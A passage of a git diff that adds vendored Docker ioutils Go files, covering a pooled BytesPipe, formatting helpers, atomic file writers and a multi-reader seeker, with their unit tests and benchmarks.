+const minCap = 64
+
+// blockThreshold is the minimum number of bytes in the buffer which will cause
+// a write to BytesPipe to block when allocating a new slice.
+const blockThreshold = 1e6
+
+var (
+	// ErrClosed is returned when Write is called on a closed BytesPipe.
+	ErrClosed = errors.New("write to closed BytesPipe")
+
+	bufPools     = make(map[int]*sync.Pool)
+	bufPoolsLock sync.Mutex
+)
+
+// BytesPipe is io.ReadWriteCloser which works similarly to pipe(queue).
+// All written data may be read at most once. Also, BytesPipe allocates
+// and releases new byte slices to adjust to current needs, so the buffer
+// won't be overgrown after peak loads.
+type BytesPipe struct {
+	mu       sync.Mutex
+	wait     *sync.Cond
+	buf      []*fixedBuffer
+	bufLen   int
+	closeErr error // error to return from next Read. set to nil if not closed.
+}
+
+// NewBytesPipe creates new BytesPipe, initialized by specified slice.
+// If buf is nil, then it will be initialized with slice which cap is 64.
+// buf will be adjusted in a way that len(buf) == 0, cap(buf) == cap(buf).
+func NewBytesPipe() *BytesPipe {
+	bp := &BytesPipe{}
+	bp.buf = append(bp.buf, getBuffer(minCap))
+	bp.wait = sync.NewCond(&bp.mu)
+	return bp
+}
+
+// Write writes p to BytesPipe.
+// It can allocate new []byte slices in a process of writing.
+func (bp *BytesPipe) Write(p []byte) (int, error) {
+	bp.mu.Lock()
+
+	written := 0
+loop0:
+	for {
+		if bp.closeErr != nil {
+			bp.mu.Unlock()
+			return written, ErrClosed
+		}
+
+		if len(bp.buf) == 0 {
+			bp.buf = append(bp.buf, getBuffer(64))
+		}
+		// get the last buffer
+		b := bp.buf[len(bp.buf)-1]
+
+		n, err := b.Write(p)
+		written += n
+		bp.bufLen += n
+
+		// errBufferFull is an error we expect to get if the buffer is full
+		if err != nil && err != errBufferFull {
+			bp.wait.Broadcast()
+			bp.mu.Unlock()
+			return written, err
+		}
+
+		// if there was enough room to write all then break
+		if len(p) == n {
+			break
+		}
+
+		// more data: write to the next slice
+		p = p[n:]
+
+		// make sure the buffer doesn't grow too big from this write
+		for bp.bufLen >= blockThreshold {
+			bp.wait.Wait()
+			if bp.closeErr != nil {
+				continue loop0
+			}
+		}
+
+		// add new byte slice to the buffers slice and continue writing
+		nextCap := b.Cap() * 2
+		if nextCap > maxCap {
+			nextCap = maxCap
+		}
+		bp.buf = append(bp.buf, getBuffer(nextCap))
+	}
+	bp.wait.Broadcast()
+	bp.mu.Unlock()
+	return written, nil
+}
+
+// CloseWithError causes further reads from a BytesPipe to return immediately.
+func (bp *BytesPipe) CloseWithError(err error) error {
+	bp.mu.Lock()
+	if err != nil {
+		bp.closeErr = err
+	} else {
+		bp.closeErr = io.EOF
+	}
+	bp.wait.Broadcast()
+	bp.mu.Unlock()
+	return nil
+}
+
+// Close causes further reads from a BytesPipe to return immediately.
+func (bp *BytesPipe) Close() error {
+	return bp.CloseWithError(nil)
+}
+
+// Read reads bytes from BytesPipe.
+// Data could be read only once.
+func (bp *BytesPipe) Read(p []byte) (n int, err error) {
+	bp.mu.Lock()
+	if bp.bufLen == 0 {
+		if bp.closeErr != nil {
+			bp.mu.Unlock()
+			return 0, bp.closeErr
+		}
+		bp.wait.Wait()
+		if bp.bufLen == 0 && bp.closeErr != nil {
+			err := bp.closeErr
+			bp.mu.Unlock()
+			return 0, err
+		}
+	}
+
+	for bp.bufLen > 0 {
+		b := bp.buf[0]
+		read, _ := b.Read(p) // ignore error since fixedBuffer doesn't really return an error
+		n += read
+		bp.bufLen -= read
+
+		if b.Len() == 0 {
+			// it's empty so return it to the pool and move to the next one
+			returnBuffer(b)
+			bp.buf[0] = nil
+			bp.buf = bp.buf[1:]
+		}
+
+		if len(p) == read {
+			break
+		}
+
+		p = p[read:]
+	}
+
+	bp.wait.Broadcast()
+	bp.mu.Unlock()
+	return
+}
+
+func returnBuffer(b *fixedBuffer) {
+	b.Reset()
+	bufPoolsLock.Lock()
+	pool := bufPools[b.Cap()]
+	bufPoolsLock.Unlock()
+	if pool != nil {
+		pool.Put(b)
+	}
+}
+
+func getBuffer(size int) *fixedBuffer {
+	bufPoolsLock.Lock()
+	pool, ok := bufPools[size]
+	if !ok {
+		pool = &sync.Pool{New: func() interface{} { return &fixedBuffer{buf: make([]byte, 0, size)} }}
+		bufPools[size] = pool
+	}
+	bufPoolsLock.Unlock()
+	return pool.Get().(*fixedBuffer)
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go
new file mode 100644
index 0000000000..300fb5f6d5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/bytespipe_test.go
@@ -0,0 +1,159 @@
+package ioutils
+
+import (
+	"crypto/sha1"
+	"encoding/hex"
+	"math/rand"
+	"testing"
+	"time"
+)
+
+func TestBytesPipeRead(t *testing.T) {
+	buf := NewBytesPipe()
+	buf.Write([]byte("12"))
+	buf.Write([]byte("34"))
+	buf.Write([]byte("56"))
+	buf.Write([]byte("78"))
+	buf.Write([]byte("90"))
+	rd := make([]byte, 4)
+	n, err := buf.Read(rd)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if n != 4 {
+		t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 4)
+	}
+	if string(rd) != "1234" {
+		t.Fatalf("Read %s, but must be %s", rd, "1234")
+	}
+	n, err = buf.Read(rd)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if n != 4 {
+		t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 4)
+	}
+	if string(rd) != "5678" {
+		t.Fatalf("Read %s, but must be %s", rd, "5679")
+	}
+	n, err = buf.Read(rd)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if n != 2 {
+		t.Fatalf("Wrong number of bytes read: %d, should be %d", n, 2)
+	}
+	if string(rd[:n]) != "90" {
+		t.Fatalf("Read %s, but must be %s", rd, "90")
+	}
+}
+
+func TestBytesPipeWrite(t *testing.T) {
+	buf := NewBytesPipe()
+	buf.Write([]byte("12"))
+	buf.Write([]byte("34"))
+	buf.Write([]byte("56"))
+	buf.Write([]byte("78"))
+	buf.Write([]byte("90"))
+	if buf.buf[0].String() != "1234567890" {
+		t.Fatalf("Buffer %q, must be %q", buf.buf[0].String(), "1234567890")
+	}
+}
+
+// Write and read in different speeds/chunk sizes and check valid data is read.
+func TestBytesPipeWriteRandomChunks(t *testing.T) {
+	cases := []struct{ iterations, writesPerLoop, readsPerLoop int }{
+		{100, 10, 1},
+		{1000, 10, 5},
+		{1000, 100, 0},
+		{1000, 5, 6},
+		{10000, 50, 25},
+	}
+
+	testMessage := []byte("this is a random string for testing")
+	// random slice sizes to read and write
+	writeChunks := []int{25, 35, 15, 20}
+	readChunks := []int{5, 45, 20, 25}
+
+	for _, c := range cases {
+		// first pass: write directly to hash
+		hash := sha1.New()
+		for i := 0; i < c.iterations*c.writesPerLoop; i++ {
+			if _, err := hash.Write(testMessage[:writeChunks[i%len(writeChunks)]]); err != nil {
+				t.Fatal(err)
+			}
+		}
+		expected := hex.EncodeToString(hash.Sum(nil))
+
+		// write/read through buffer
+		buf := NewBytesPipe()
+		hash.Reset()
+
+		done := make(chan struct{})
+
+		go func() {
+			// random delay before read starts
+			<-time.After(time.Duration(rand.Intn(10)) * time.Millisecond)
+			for i := 0; ; i++ {
+				p := make([]byte, readChunks[(c.iterations*c.readsPerLoop+i)%len(readChunks)])
+				n, _ := buf.Read(p)
+				if n == 0 {
+					break
+				}
+				hash.Write(p[:n])
+			}
+
+			close(done)
+		}()
+
+		for i := 0; i < c.iterations; i++ {
+			for w := 0; w < c.writesPerLoop; w++ {
+				buf.Write(testMessage[:writeChunks[(i*c.writesPerLoop+w)%len(writeChunks)]])
+			}
+		}
+		buf.Close()
+		<-done
+
+		actual := hex.EncodeToString(hash.Sum(nil))
+
+		if expected != actual {
+			t.Fatalf("BytesPipe returned invalid data. Expected checksum %v, got %v", expected, actual)
+		}
+
+	}
+}
+
+func BenchmarkBytesPipeWrite(b *testing.B) {
+	testData := []byte("pretty short line, because why not?")
+	for i := 0; i < b.N; i++ {
+		readBuf := make([]byte, 1024)
+		buf := NewBytesPipe()
+		go func() {
+			var err error
+			for err == nil {
+				_, err = buf.Read(readBuf)
+			}
+		}()
+		for j := 0; j < 1000; j++ {
+			buf.Write(testData)
+		}
+		buf.Close()
+	}
+}
+
+func BenchmarkBytesPipeRead(b *testing.B) {
+	rd := make([]byte, 512)
+	for i := 0; i < b.N; i++ {
+		b.StopTimer()
+		buf := NewBytesPipe()
+		for j := 0; j < 500; j++ {
+			buf.Write(make([]byte, 1024))
+		}
+		b.StartTimer()
+		for j := 0; j < 1000; j++ {
+			if n, _ := buf.Read(rd); n != 512 {
+				b.Fatalf("Wrong number of bytes: %d", n)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go
new file mode 100644
index 0000000000..0b04b0ba3e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/fmt.go
@@ -0,0 +1,22 @@
+package ioutils
+
+import (
+	"fmt"
+	"io"
+)
+
+// FprintfIfNotEmpty prints the string value if it's not empty
+func FprintfIfNotEmpty(w io.Writer, format, value string) (int, error) {
+	if value != "" {
+		return fmt.Fprintf(w, format, value)
+	}
+	return 0, nil
+}
+
+// FprintfIfTrue prints the boolean value if it's true
+func FprintfIfTrue(w io.Writer, format string, ok bool) (int, error) {
+	if ok {
+		return fmt.Fprintf(w, format, ok)
+	}
+	return 0, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go
new file mode 100644
index 0000000000..8968863296
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/fmt_test.go
@@ -0,0 +1,17 @@
+package ioutils
+
+import "testing"
+
+func TestFprintfIfNotEmpty(t *testing.T) {
+	wc := NewWriteCounter(&NopWriter{})
+	n, _ := FprintfIfNotEmpty(wc, "foo%s", "")
+
+	if wc.Count != 0 || n != 0 {
+		t.Errorf("Wrong count: %v vs. %v vs. 0", wc.Count, n)
+	}
+
+	n, _ = FprintfIfNotEmpty(wc, "foo%s", "bar")
+	if wc.Count != 6 || n != 6 {
+		t.Errorf("Wrong count: %v vs. %v vs. 6", wc.Count, n)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go
new file mode 100644
index 0000000000..a56c462651
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters.go
@@ -0,0 +1,162 @@
+package ioutils
+
+import (
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+)
+
+// NewAtomicFileWriter returns WriteCloser so that writing to it writes to a
+// temporary file and closing it atomically changes the temporary file to
+// destination path. Writing and closing concurrently is not allowed.
+func NewAtomicFileWriter(filename string, perm os.FileMode) (io.WriteCloser, error) {
+	f, err := ioutil.TempFile(filepath.Dir(filename), ".tmp-"+filepath.Base(filename))
+	if err != nil {
+		return nil, err
+	}
+
+	abspath, err := filepath.Abs(filename)
+	if err != nil {
+		return nil, err
+	}
+	return &atomicFileWriter{
+		f:    f,
+		fn:   abspath,
+		perm: perm,
+	}, nil
+}
+
+// AtomicWriteFile atomically writes data to a file named by filename.
+func AtomicWriteFile(filename string, data []byte, perm os.FileMode) error {
+	f, err := NewAtomicFileWriter(filename, perm)
+	if err != nil {
+		return err
+	}
+	n, err := f.Write(data)
+	if err == nil && n < len(data) {
+		err = io.ErrShortWrite
+		f.(*atomicFileWriter).writeErr = err
+	}
+	if err1 := f.Close(); err == nil {
+		err = err1
+	}
+	return err
+}
+
+type atomicFileWriter struct {
+	f        *os.File
+	fn       string
+	writeErr error
+	perm     os.FileMode
+}
+
+func (w *atomicFileWriter) Write(dt []byte) (int, error) {
+	n, err := w.f.Write(dt)
+	if err != nil {
+		w.writeErr = err
+	}
+	return n, err
+}
+
+func (w *atomicFileWriter) Close() (retErr error) {
+	defer func() {
+		if retErr != nil || w.writeErr != nil {
+			os.Remove(w.f.Name())
+		}
+	}()
+	if err := w.f.Sync(); err != nil {
+		w.f.Close()
+		return err
+	}
+	if err := w.f.Close(); err != nil {
+		return err
+	}
+	if err := os.Chmod(w.f.Name(), w.perm); err != nil {
+		return err
+	}
+	if w.writeErr == nil {
+		return os.Rename(w.f.Name(), w.fn)
+	}
+	return nil
+}
+
+// AtomicWriteSet is used to atomically write a set
+// of files and ensure they are visible at the same time.
+// Must be committed to a new directory.
+type AtomicWriteSet struct {
+	root string
+}
+
+// NewAtomicWriteSet creates a new atomic write set to
+// atomically create a set of files. The given directory
+// is used as the base directory for storing files before
+// commit. If no temporary directory is given the system
+// default is used.
+func NewAtomicWriteSet(tmpDir string) (*AtomicWriteSet, error) {
+	td, err := ioutil.TempDir(tmpDir, "write-set-")
+	if err != nil {
+		return nil, err
+	}
+
+	return &AtomicWriteSet{
+		root: td,
+	}, nil
+}
+
+// WriteFile writes a file to the set, guaranteeing the file
+// has been synced.
+func (ws *AtomicWriteSet) WriteFile(filename string, data []byte, perm os.FileMode) error {
+	f, err := ws.FileWriter(filename, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
+	if err != nil {
+		return err
+	}
+	n, err := f.Write(data)
+	if err == nil && n < len(data) {
+		err = io.ErrShortWrite
+	}
+	if err1 := f.Close(); err == nil {
+		err = err1
+	}
+	return err
+}
+
+type syncFileCloser struct {
+	*os.File
+}
+
+func (w syncFileCloser) Close() error {
+	err := w.File.Sync()
+	if err1 := w.File.Close(); err == nil {
+		err = err1
+	}
+	return err
+}
+
+// FileWriter opens a file writer inside the set. The file
+// should be synced and closed before calling commit.
+func (ws *AtomicWriteSet) FileWriter(name string, flag int, perm os.FileMode) (io.WriteCloser, error) {
+	f, err := os.OpenFile(filepath.Join(ws.root, name), flag, perm)
+	if err != nil {
+		return nil, err
+	}
+	return syncFileCloser{f}, nil
+}
+
+// Cancel cancels the set and removes all temporary data
+// created in the set.
+func (ws *AtomicWriteSet) Cancel() error {
+	return os.RemoveAll(ws.root)
+}
+
+// Commit moves all created files to the target directory. The
+// target directory must not exist and the parent of the target
+// directory must exist.
+func (ws *AtomicWriteSet) Commit(target string) error {
+	return os.Rename(ws.root, target)
+}
+
+// String returns the location the set is writing to.
+func (ws *AtomicWriteSet) String() string {
+	return ws.root
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go
new file mode 100644
index 0000000000..c4d1419306
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/fswriters_test.go
@@ -0,0 +1,132 @@
+package ioutils
+
+import (
+	"bytes"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+)
+
+var (
+	testMode os.FileMode = 0640
+)
+
+func init() {
+	// Windows does not support full Linux file mode
+	if runtime.GOOS == "windows" {
+		testMode = 0666
+	}
+}
+
+func TestAtomicWriteToFile(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "atomic-writers-test")
+	if err != nil {
+		t.Fatalf("Error when creating temporary directory: %s", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	expected := []byte("barbaz")
+	if err := AtomicWriteFile(filepath.Join(tmpDir, "foo"), expected, testMode); err != nil {
+		t.Fatalf("Error writing to file: %v", err)
+	}
+
+	actual, err := ioutil.ReadFile(filepath.Join(tmpDir, "foo"))
+	if err != nil {
+		t.Fatalf("Error reading from file: %v", err)
+	}
+
+	if bytes.Compare(actual, expected) != 0 {
+		t.Fatalf("Data mismatch, expected %q, got %q", expected, actual)
+	}
+
+	st, err := os.Stat(filepath.Join(tmpDir, "foo"))
+	if err != nil {
+		t.Fatalf("Error statting file: %v", err)
+	}
+	if expected := os.FileMode(testMode); st.Mode() != expected {
+		t.Fatalf("Mode mismatched, expected %o, got %o", expected, st.Mode())
+	}
+}
+
+func TestAtomicWriteSetCommit(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "atomic-writerset-test")
+	if err != nil {
+		t.Fatalf("Error when creating temporary directory: %s", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	if err := os.Mkdir(filepath.Join(tmpDir, "tmp"), 0700); err != nil {
+		t.Fatalf("Error creating tmp directory: %s", err)
+	}
+
+	targetDir := filepath.Join(tmpDir, "target")
+	ws, err := NewAtomicWriteSet(filepath.Join(tmpDir, "tmp"))
+	if err != nil {
+		t.Fatalf("Error creating atomic write set: %s", err)
+	}
+
+	expected := []byte("barbaz")
+	if err := ws.WriteFile("foo", expected, testMode); err != nil {
+		t.Fatalf("Error writing to file: %v", err)
+	}
+
+	if _, err := ioutil.ReadFile(filepath.Join(targetDir, "foo")); err == nil {
+		t.Fatalf("Expected error reading file where should not exist")
+	}
+
+	if err := ws.Commit(targetDir); err != nil {
+		t.Fatalf("Error committing file: %s", err)
+	}
+
+	actual, err := ioutil.ReadFile(filepath.Join(targetDir, "foo"))
+	if err != nil {
+		t.Fatalf("Error reading from file: %v", err)
+	}
+
+	if bytes.Compare(actual, expected) != 0 {
+		t.Fatalf("Data mismatch, expected %q, got %q", expected, actual)
+	}
+
+	st, err := os.Stat(filepath.Join(targetDir, "foo"))
+	if err != nil {
+		t.Fatalf("Error statting file: %v", err)
+	}
+	if expected := os.FileMode(testMode); st.Mode() != expected {
+		t.Fatalf("Mode mismatched, expected %o, got %o", expected, st.Mode())
+	}
+
+}
+
+func TestAtomicWriteSetCancel(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "atomic-writerset-test")
+	if err != nil {
+		t.Fatalf("Error when creating temporary directory: %s", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	if err := os.Mkdir(filepath.Join(tmpDir, "tmp"), 0700); err != nil {
+		t.Fatalf("Error creating tmp directory: %s", err)
+	}
+
+	ws, err := NewAtomicWriteSet(filepath.Join(tmpDir, "tmp"))
+	if err != nil {
+		t.Fatalf("Error creating atomic write set: %s", err)
+	}
+
+	expected := []byte("barbaz")
+	if err := ws.WriteFile("foo", expected, testMode); err != nil {
+		t.Fatalf("Error writing to file: %v", err)
+	}
+
+	if err := ws.Cancel(); err != nil {
+		t.Fatalf("Error committing file: %s", err)
+	}
+
+	if _, err := ioutil.ReadFile(filepath.Join(tmpDir, "target", "foo")); err == nil {
+		t.Fatalf("Expected error reading file where should not exist")
+	} else if !os.IsNotExist(err) {
+		t.Fatalf("Unexpected error reading file: %s", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go b/vendor/github.com/docker/docker/pkg/ioutils/multireader.go
new file mode 100644
index 0000000000..d7b97486c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/multireader.go
@@ -0,0 +1,223 @@
+package ioutils
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"os"
+)
+
+type pos struct {
+	idx    int
+	offset int64
+}
+
+type multiReadSeeker struct {
+	readers []io.ReadSeeker
+	pos     *pos
+	posIdx  map[io.ReadSeeker]int
+}
+
+func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) {
+	var tmpOffset int64
+	switch whence {
+	case os.SEEK_SET:
+		for i, rdr := range r.readers {
+			// get size of the current reader
+			s, err := rdr.Seek(0, os.SEEK_END)
+			if err != nil {
+				return -1, err
+			}
+
+			if offset > tmpOffset+s {
+				if i == len(r.readers)-1 {
+					rdrOffset := s + (offset - tmpOffset)
+					if _, err := rdr.Seek(rdrOffset, os.SEEK_SET); err != nil {
+						return -1, err
+					}
+					r.pos = &pos{i, rdrOffset}
+					return offset, nil
+				}
+
+				tmpOffset += s
+				continue
+			}
+
+			rdrOffset := offset - tmpOffset
+			idx := i
+
+			rdr.Seek(rdrOffset, os.SEEK_SET)
+			// make sure all following readers are at 0
+			for _, rdr := range r.readers[i+1:] {
+				rdr.Seek(0, os.SEEK_SET)
+			}
+
+			if rdrOffset == s && i != len(r.readers)-1 {
+				idx++
+				rdrOffset = 0
+			}
+			r.pos = &pos{idx, rdrOffset}
+			return offset, nil
+		}
+	case os.SEEK_END:
+		for _, rdr := range r.readers {
+			s, err := rdr.Seek(0, os.SEEK_END)
+			if err != nil {
+				return -1, err
+			}
+			tmpOffset += s
+		}
+		r.Seek(tmpOffset+offset, os.SEEK_SET)
+		return tmpOffset + offset, nil
+	case os.SEEK_CUR:
+		if r.pos == nil {
+			return r.Seek(offset, os.SEEK_SET)
+		}
+		// Just return the current offset
+		if offset == 0 {
+			return r.getCurOffset()
+		}
+
+		curOffset, err := r.getCurOffset()
+		if err != nil {
+			return -1, err
+		}
+		rdr, rdrOffset, err := r.getReaderForOffset(curOffset + offset)
+		if err != nil {
+			return -1, err
+		}
+
+		r.pos = &pos{r.posIdx[rdr], rdrOffset}
+		return curOffset + offset, nil
+	default:
+		return -1, fmt.Errorf("Invalid whence: %d", whence)
+	}
+
+	return -1, fmt.Errorf("Error seeking for whence: %d, offset: %d", whence, offset)
+}
+
+func (r *multiReadSeeker) getReaderForOffset(offset int64) (io.ReadSeeker, int64, error) {
+
+	var offsetTo int64
+
+	for _, rdr := range r.readers {
+		size, err := getReadSeekerSize(rdr)
+		if err != nil {
+			return nil, -1, err
+		}
+		if offsetTo+size > offset {
+			return rdr, offset - offsetTo, nil
+		}
+		if rdr == r.readers[len(r.readers)-1] {
+			return rdr, offsetTo + offset, nil
+		}
+		offsetTo += size
+	}
+
+	return nil, 0, nil
+}
+
+func (r *multiReadSeeker) getCurOffset() (int64, error) {
+	var totalSize int64
+	for _, rdr := range r.readers[:r.pos.idx+1] {
+		if r.posIdx[rdr] == r.pos.idx {
+			totalSize += r.pos.offset
+			break
+		}
+
+		size, err := getReadSeekerSize(rdr)
+		if err != nil {
+			return -1, fmt.Errorf("error getting seeker size: %v", err)
+		}
+		totalSize += size
+	}
+	return totalSize, nil
+}
+
+func (r *multiReadSeeker) getOffsetToReader(rdr io.ReadSeeker) (int64, error) {
+	var offset int64
+	for _, r := range r.readers {
+		if r == rdr {
+			break
+		}
+
+		size, err := getReadSeekerSize(rdr)
+		if err != nil {
+			return -1, err
+		}
+		offset += size
+	}
+	return offset, nil
+}
+
+func (r *multiReadSeeker) Read(b []byte) (int, error) {
+	if r.pos == nil {
+		r.pos = &pos{0, 0}
+	}
+
+	bLen := int64(len(b))
+	buf := bytes.NewBuffer(nil)
+	var rdr io.ReadSeeker
+
+	for _, rdr = range r.readers[r.pos.idx:] {
+		readBytes, err := io.CopyN(buf, rdr, bLen)
+		if err != nil && err != io.EOF {
+			return -1, err
+		}
+		bLen -= readBytes
+
+		if bLen == 0 {
+			break
+		}
+	}
+
+	rdrPos, err := rdr.Seek(0, os.SEEK_CUR)
+	if err != nil {
+		return -1, err
+	}
+	r.pos = &pos{r.posIdx[rdr], rdrPos}
+	return buf.Read(b)
+}
+
+func getReadSeekerSize(rdr io.ReadSeeker) (int64, error) {
+	// save the current position
+	pos, err := rdr.Seek(0, os.SEEK_CUR)
+	if err != nil {
+		return -1, err
+	}
+
+	// get the size
+	size, err := rdr.Seek(0, os.SEEK_END)
+	if err != nil {
+		return -1, err
+	}
+
+	// reset the position
+	if _, err := rdr.Seek(pos, os.SEEK_SET); err != nil {
+		return -1, err
+	}
+	return size, nil
+}
+
+// MultiReadSeeker returns a ReadSeeker that's the logical concatenation of the provided
+// input readseekers. After calling this method the initial position is set to the
+// beginning of the first ReadSeeker. At the end of a ReadSeeker, Read always advances
+// to the beginning of the next ReadSeeker and returns EOF at the end of the last ReadSeeker.
+// Seek can be used over the sum of lengths of all readseekers.
+//
+// When a MultiReadSeeker is used, no Read and Seek operations should be made on
+// its ReadSeeker components. Also, users should make no assumption on the state
+// of individual readseekers while the MultiReadSeeker is used.
+func MultiReadSeeker(readers ...io.ReadSeeker) io.ReadSeeker {
+	if len(readers) == 1 {
+		return readers[0]
+	}
+	idx := make(map[io.ReadSeeker]int)
+	for i, rdr := range readers {
+		idx[rdr] = i
+	}
+	return &multiReadSeeker{
+		readers: readers,
+		posIdx:  idx,
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go b/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go
new file mode 100644
index 0000000000..65309a9565
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go
@@ -0,0 +1,211 @@
+package ioutils
+
+import (
+	"bytes"
+	"encoding/binary"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+)
+
+func TestMultiReadSeekerReadAll(t *testing.T) {
+	str := "hello world"
+	s1 := strings.NewReader(str + " 1")
+	s2 := strings.NewReader(str + " 2")
+	s3 := strings.NewReader(str + " 3")
+	mr := MultiReadSeeker(s1, s2, s3)
+
+	expectedSize := int64(s1.Len() + s2.Len() + s3.Len())
+
+	b, err := ioutil.ReadAll(mr)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expected := "hello world 1hello world 2hello world 3"
+	if string(b) != expected {
+		t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected)
+	}
+
+	size, err := mr.Seek(0, os.SEEK_END)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if size != expectedSize {
+		t.Fatalf("reader size does not match, got %d, expected %d", size, expectedSize)
+	}
+
+	// Reset the position and read again
+	pos, err := mr.Seek(0, os.SEEK_SET)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if pos != 0 {
+		t.Fatalf("expected position to be set to 0, got %d", pos)
+	}
+
+	b, err = ioutil.ReadAll(mr)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if string(b) != expected {
+		t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected)
+	}
+}
+
+func TestMultiReadSeekerReadEach(t *testing.T) {
+	str := "hello world"
+	s1 := strings.NewReader(str + " 1")
+	s2 := strings.NewReader(str + " 2")
+	s3 := strings.NewReader(str + " 3")
+	mr := MultiReadSeeker(s1, s2, s3)
+
+	var totalBytes int64
+	for i, s := range []*strings.Reader{s1, s2, s3} {
+		sLen := int64(s.Len())
+		buf := make([]byte, s.Len())
+		expected := []byte(fmt.Sprintf("%s %d", str, i+1))
+
+		if _, err := mr.Read(buf); err != nil && err != io.EOF {
+			t.Fatal(err)
+		}
+
+		if !bytes.Equal(buf, expected) {
+			t.Fatalf("expected %q to be %q", string(buf), string(expected))
+		}
+
+		pos, err := mr.Seek(0, os.SEEK_CUR)
+		if err != nil {
+			t.Fatalf("iteration: %d, error: %v", i+1, err)
+		}
+
+		// check that the total bytes read is the current position of the seeker
+		totalBytes += sLen
+		if pos != totalBytes {
+			t.Fatalf("expected current position to be: %d, got: %d, iteration: %d", totalBytes, pos, i+1)
+		}
+
+		// This tests not only that SEEK_SET and SEEK_CUR give the same values, but that the next iteration is in the expected position as well
+		newPos, err := mr.Seek(pos, os.SEEK_SET)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if newPos != pos {
+			t.Fatalf("expected to get same position when calling SEEK_SET with value from SEEK_CUR, cur: %d, set: %d", pos, newPos)
+		}
+	}
+}
+
+func TestMultiReadSeekerReadSpanningChunks(t *testing.T) {
+	str := "hello world"
+	s1 := strings.NewReader(str + " 1")
+	s2 := strings.NewReader(str + " 2")
+	s3 := strings.NewReader(str + " 3")
+	mr := MultiReadSeeker(s1, s2, s3)
+
+	buf := make([]byte, s1.Len()+3)
+	_, err := mr.Read(buf)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// expected is the contents of s1 + 3 bytes from s2, ie, the `hel` at the end of this string
+	expected := "hello world 1hel"
+	if string(buf) != expected {
+		t.Fatalf("expected %s to be %s", string(buf), expected)
+	}
+}
+
+func TestMultiReadSeekerNegativeSeek(t *testing.T) {
+	str := "hello world"
+	s1 := strings.NewReader(str + " 1")
+	s2 := strings.NewReader(str + " 2")
+	s3 := strings.NewReader(str + " 3")
+	mr := MultiReadSeeker(s1, s2, s3)
+
+	s1Len := s1.Len()
+	s2Len := s2.Len()
+	s3Len := s3.Len()
+
+	s, err := mr.Seek(int64(-1*s3.Len()), os.SEEK_END)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if s != int64(s1Len+s2Len) {
+		t.Fatalf("expected %d to be %d", s, s1.Len()+s2.Len())
+	}
+
+	buf := make([]byte, s3Len)
+	if _, err := mr.Read(buf); err != nil && err != io.EOF {
+		t.Fatal(err)
+	}
+	expected := fmt.Sprintf("%s %d", str, 3)
+	if string(buf) != fmt.Sprintf("%s %d", str, 3) {
+		t.Fatalf("expected %q to be %q", string(buf), expected)
+	}
+}
+
+func TestMultiReadSeekerCurAfterSet(t *testing.T) {
+	str := "hello world"
+	s1 := strings.NewReader(str + " 1")
+	s2 := strings.NewReader(str + " 2")
+	s3 := strings.NewReader(str + " 3")
+	mr := MultiReadSeeker(s1, s2, s3)
+
+	mid := int64(s1.Len() + s2.Len()/2)
+
+	size, err := mr.Seek(mid, os.SEEK_SET)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if size != mid {
+		t.Fatalf("reader size does not match, got %d, expected %d", size, mid)
+	}
+
+	size, err = mr.Seek(3, os.SEEK_CUR)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if size != mid+3 {
+		t.Fatalf("reader size does not match, got %d, expected %d", size, mid+3)
+	}
+	size, err = mr.Seek(5, os.SEEK_CUR)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if size != mid+8 {
+		t.Fatalf("reader size does not match, got %d, expected %d", size, mid+8)
+	}
+
+	size, err = mr.Seek(10, os.SEEK_CUR)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if size != mid+18 {
+		t.Fatalf("reader size does not match, got %d, expected %d", size, mid+18)
+	}
+}
+
